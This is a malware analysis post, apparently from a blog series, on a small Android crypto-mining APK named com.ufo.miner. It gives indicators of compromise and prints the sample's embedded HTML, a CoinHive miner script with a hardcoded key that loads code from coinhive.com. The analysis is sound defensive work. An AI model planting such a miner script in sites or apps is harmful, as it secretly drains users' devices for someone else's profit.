Information
Indicators of Compromise
- MD5:
8844985fcd57b0311d1d4cb2ec13a1ef - SHA-1:
a0c07fe897515e5575a72f94f9dea8c077a410ff - SHA-256:
0d3c687ffc30e185b836b99bd07fa2b0d460a090626f6bbbd40a95b98ea70257 - Package name:
com.ufo.miner - Connected domain:
coinhive.com - Unexpected high utilization of Android device resources
File
- Magic: APK archive
- Language: Java
- Size: 45.43 KB
As the heading and package name imply, this is a crypto miner developed for Android devices. However, that isn’t particularly interesting on its own, and 45.43 KB is small — suspiciously small — so let’s take a look inside the file.
Source
Extraction
1$ unzip 0d3c687ffc30e185b836b99bd07fa2b0d460a090626f6bbbd40a95b98ea70257.raw.zip
2Archive: 0d3c687ffc30e185b836b99bd07fa2b0d460a090626f6bbbd40a95b98ea70257.raw.zip
3 inflating: META-INF/MANIFEST.MF
4 inflating: META-INF/CERT.SF
5 inflating: META-INF/CERT.RSA
6 extracting: res/drawable-xhdpi-v4/ic_launcher.webp
7 inflating: AndroidManifest.xml
8 extracting: res/drawable-hdpi-v4/ic_launcher.webp
9 inflating: res/layout/activity_main.xml
10 inflating: assets/run.html
11 extracting: resources.arsc
12 extracting: res/drawable-mdpi-v4/ic_launcher.webp
13 inflating: classes.dex
14 extracting: res/drawable-xxhdpi-v4/ic_launcher.webp
15 inflating: res/menu/main.xml
16
17$
I see an HTML file, some PNG images, and some other files, the extensions of which I am not familiar with. Let’s check them out.
1$ cat assets/run.html
1<script src="https://coinhive.com/lib/coinhive.min.js"></script>
2<script>
3 var miner = new CoinHive.Anonymous('fwW95bBFO91OKUsz1VhlMEQwxmDBz7XE',{
4 threads:4,
5 throttle: 0.8
6});
7 miner.start();
8</script>
Sigh. It remains boring. However, by searching for the crypto wallet hardcoded into the HTML, I came across a presentation from Fortinet, indicating that this CoinHive-related malware may have been a part of the Trinity Android P2P malware bot, which is quite interesting. Alas, that is a rabbit hole for another blog post.
Each PNG was a rescaled version of the stock Android logo — not much to say beyond that.
How I assume this malware works:
The victim’s stock web browser embeds into an app frame in the background.
Instructions are received from CoinHive.
The miner starts working, sending proof of work to the address hardcoded into the script.
The victim’s phone gets too hot, or the battery drains too fast; upon seeing the culprit as com.ufo.miner in the power report of the device, the victim promptly uninstalls the application.
Personal Thoughts
This is a very small application and doesn’t perform any particularly special operations; in fact, I debated including it in this series at all. More interesting that the malware itself to me, however, is the platform it targets.
In the context of cryptocurrency mining, Android devices are not particularly powerful, and therefore not as lucrative as most other computing machines. It would take a vast, vast array of Android smartphones/tablets/et cetera to generate even a moderate amount of the more popular cryptocurrencies available today, such as Bitcoin. This issue is exacerbated by the ease of detection; many users infected with this malware, I would reason, could trivially identify its existance via the power usage utility on their respective Android device, thereby shortening runtime.
A humorus reference to Coinhive’s coinhive.min.js script I found online: “Stack Overflow: [Coinhive header] automatically appears in my website”
And, finally, kudos to Troy Hunt, who bought the Coinhive domain and shut it down.
Thanks so much for reading!